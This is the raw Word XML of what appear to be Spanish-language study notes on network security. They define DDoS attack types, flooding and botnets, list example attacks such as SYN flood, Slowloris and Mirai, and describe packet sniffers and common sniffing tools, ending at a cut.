    <w:p w14:paraId="14E00098" w14:textId="77777777" w:rsidR="00526003" w:rsidRDefault="007A6A2D" w:rsidP="00526003">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tipos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31339B3D" w14:textId="482D63B3" w:rsidR="00526003" w:rsidRPr="00526003" w:rsidRDefault="007A6A2D" w:rsidP="00526003">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Volume-based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DDos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00526003" w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ttacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Se inunda con paquetes o conexiones de re</w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobrecargando el equipamiento de la red de servidores o ancho de banda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825F823" w14:textId="77777777" w:rsidR="00526003" w:rsidRPr="00526003" w:rsidRDefault="007A6A2D" w:rsidP="00526003">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DDos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ttacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se opera a nivel de aplicación usualmente por HTTP intentando saturar</w:t>
      </w:r>
      <w:r w:rsidR="00347556" w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el servidor/servicio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100BA5D2" w14:textId="682C323C" w:rsidR="00347556" w:rsidRPr="00526003" w:rsidRDefault="00347556" w:rsidP="00526003">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Low-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> DoS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>LDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ttacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se explota una vulnerabilidad de diseño o implementación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565C5390" w14:textId="029022E8" w:rsidR="00347556" w:rsidRDefault="00347556" w:rsidP="00526003">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Flooding (Inundación):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> genera solicitudes maliciosas a un servicio, saturándolo o haciéndolo entrar en modo de espera. De esta forma se anula o limita funcionamiento</w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB03948" w14:textId="6E97E277" w:rsidR="00347556" w:rsidRDefault="00347556" w:rsidP="00526003">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BotNet:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conjunto de terminales que ejecutan software que permite el control total o parcial desde ubicaciones remotas. Los terminales se denominan (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>bots</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>zombies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBD89E" w14:textId="77777777" w:rsidR="00526003" w:rsidRDefault="00347556" w:rsidP="00E75C56">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplos de </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">enegación de </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ervicios (DoS)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="7812"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843"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE53EC" w14:paraId="6F04D5CC" w14:textId="77777777" w:rsidTr="00DE53EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE6CE8E" w14:textId="7C8ECE3D" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Inundación SYN (SYN </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8EEC1B" w14:textId="5DF4095A" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Inundación ICMP (ICMP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE53EC" w14:paraId="09236ABC" w14:textId="77777777" w:rsidTr="00DE53EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="278AD50B" w14:textId="210144A1" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">SMURF (ICMP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="141BCA0F" w14:textId="57833F98" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Inundación UDP (UDP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE53EC" w14:paraId="794D373B" w14:textId="77777777" w:rsidTr="00DE53EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC25423" w14:textId="1C0A8FA7" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Peer-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>-peer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70229223" w14:textId="7FAA628C" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Utilización de recursos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE53EC" w14:paraId="17479A1A" w14:textId="77777777" w:rsidTr="00DE53EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="224CCFA4" w14:textId="20B32B72" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">A nivel de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>aplicacion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C68E22" w14:textId="3E3EF8D2" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Degradación de servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w14:paraId="2A27E0CD" w14:textId="77777777" w:rsidTr="00DE53EC">
        <w:trPr>
          <w:trHeight w:val="142"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30EF92B7" w14:textId="0FD111D2" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00BA754D" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:lastRenderedPageBreak/>
              <w:t>Slowloris (</w:t>
            </w:r>
            <w:r w:rsidR="00DE53EC" w:rsidRPr="00DE53EC">
              <w:t>HTTP request parciales. Low-rate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71DC43F4" w14:textId="6C6528F3" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE53EC">
              <w:t>Mirai malware (TP-Link routers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E62F504" w14:textId="15F6A85F" w:rsidR="00347556" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00347556">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00347556" w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>Sniffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E9FAD" w14:textId="77777777" w:rsidR="00347556" w:rsidRDefault="00347556" w:rsidP="004C318E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4290556E" wp14:editId="184E7BF8">
            <wp:extent cx="3123319" cy="1002259"/>
            <wp:effectExtent l="0" t="0" r="127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849" cy="1011735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A208831" w14:textId="5EEDC616" w:rsidR="00FF45C6" w:rsidRPr="00826953" w:rsidRDefault="004C318E" w:rsidP="00347556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C318E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es un programa de captura de tramas de red. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Existen sni</w:t>
      </w:r>
      <w:r w:rsidR="00DE53EC" w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">fers para redes Ethernet </w:t>
      </w:r>
      <w:r w:rsidR="00DE53EC" w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(LAN)</w:t>
      </w:r>
      <w:r w:rsidR="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y algunos de ellos son</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Ethereal, WinPcap, Ettercap, TCPDump, WinDump, WinSniffer, Hunt, Darkstat, Traffic-vis, etc.</w:t>
      </w:r>
      <w:r w:rsidR="00826953">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00826953">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En otras palabras, son programas que permiten ver lo que esta pasando en un canal de red. Son únicamente de lectura, no pueden modificar. Se puede realizar con todo tipo de tecnologías (Bluetooth, wifi, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00826953">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00826953">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D157933" w14:textId="77777777" w:rsidR="004C318E" w:rsidRPr="00826953" w:rsidRDefault="004C318E" w:rsidP="00347556">
      <w:pPr>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Para redes inalámbricas: </w:t>
      </w:r>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Kismet, Network Stumbler, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7523F" w14:textId="18322075" w:rsidR="004C318E" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00347556">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE53EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>mplementación de Sniffers en l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>a Red Interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B27FB" w14:textId="0B6DC633" w:rsidR="004C318E" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="004C318E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D593692" wp14:editId="204F2B05">
            <wp:extent cx="3076190" cy="1728138"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="188009161" name="Imagen 1" descr="Imagen que contiene electrónica, computadora, rat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9161" name="Imagen 1" descr="Imagen que contiene electrónica, computadora, ratón&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3092374" cy="1737230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9B402" w14:textId="53977618" w:rsidR="004C318E" w:rsidRDefault="00DE53EC" w:rsidP="00347556">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
